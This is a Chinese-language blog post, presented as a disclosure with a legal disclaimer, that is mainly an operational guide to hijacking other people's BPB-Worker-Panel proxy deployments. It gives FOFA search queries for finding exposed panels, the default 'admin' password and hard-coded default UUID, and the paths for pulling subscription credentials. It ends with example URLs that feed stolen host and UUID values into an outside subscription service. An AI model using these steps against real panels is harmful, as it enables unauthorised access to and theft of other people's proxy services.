免责声明
本文档仅用于学习和教育目的,旨在帮助安全研究人员和开发者了解和防止 BPB-Worker-Panel 漏洞的利用。本博文中所包含的信息和工具仅用于合法的安全测试和研究,不得用于任何非法活动。
使用本文所提供的信息进行任何未经授权的行为均为非法行为,违反法律将导致严重的法律后果。读者在使用这些信息时,必须确保拥有合法的授权,并严格遵守所在国家和地区的法律法规。
作者不对任何因使用本文内容而导致的直接或间接损害承担责任。所有风险和责任由用户自行承担。
此外,读者必须在24小时内删除产生的内容,以确保信息不会被滥用.
泄露问题整理
- 默认反代
www.speedtest.net
(泄露项目地址,使其该项目网站便于采集,且有封号危险) - 默认面板弱口令
admin
(未强制修改面板密码,且该密码无法修改实际负责订阅的UUID,导致无密码也可以绕过并成功获取订阅) - 默认UUID
89b3cbba-e6ac-485a-9481-976a0415eab9
(无法通过管理面板修改UUID,导致修改面板密码也无法阻止获取默认订阅)
1. 打开FOFA网络测绘网站
- 搜索TLS站点 搜索关键词:
icon_hash="-1354027319" && asn="13335" && port="443"
- 搜索noTLS站点 搜索关键词:
icon_hash="-1354027319" && asn="13335" && port="80"
2. 面板弱口令
尝试访问/panel
并输入弱口令admin
。
- 如登录成功
- 进入下方点击Copy Sub获取订阅链接(例如 https://299.29.dns-dynamic.com/sub/d0bb3205-93bd-1de6-abc6-0b37013fa59e#BPB-Normal )
- 提取节点host和uuid备用
- host:299.29.dns-dynamic.com
- uuid:d0bb3205-93bd-1de6-abc6-0b37013fa59e
- 如登录失败
尝试访问默认订阅/sub/89b3cbba-e6ac-485a-9481-976a0415eab9
- 如成功返回base64内容,则提取节点host和uuid备用
- host:299.29.dns-dynamic.net
- uuid:89b3cbba-e6ac-485a-9481-976a0415eab9
- 如成功返回base64内容,则提取节点host和uuid备用
- 如上两种方法都无法访问,则该面板暂时安全
3. 如何利用
- noTLS站点利用方法
- 将host和uuid填入订阅器对应的值,
https://noTLS.fxxk.dedyn.io/sub?host=[BPB的host]&uuid=[BPB的uuid]
- 例如直接订阅该链接
https://noTLS.fxxk.dedyn.io/sub?host=299.29.dns-dynamic.com&uuid=d0bb3205-93bd-1de6-abc6-0b37013fa59e
- 将host和uuid填入订阅器对应的值,
- TLS站点利用方法
- 将host和uuid填入订阅器对应的值,
https://VLESS.fxxk.dedyn.io/sub?host=[BPB的host]&uuid=[BPB的uuid]
- 例如直接订阅该链接
https://VLESS.fxxk.dedyn.io/sub?host=299.29.dns-dynamic.net&uuid=89b3cbba-e6ac-485a-9481-976a0415eab9
- 将host和uuid填入订阅器对应的值,
以上来源于网络。用于个人收藏备份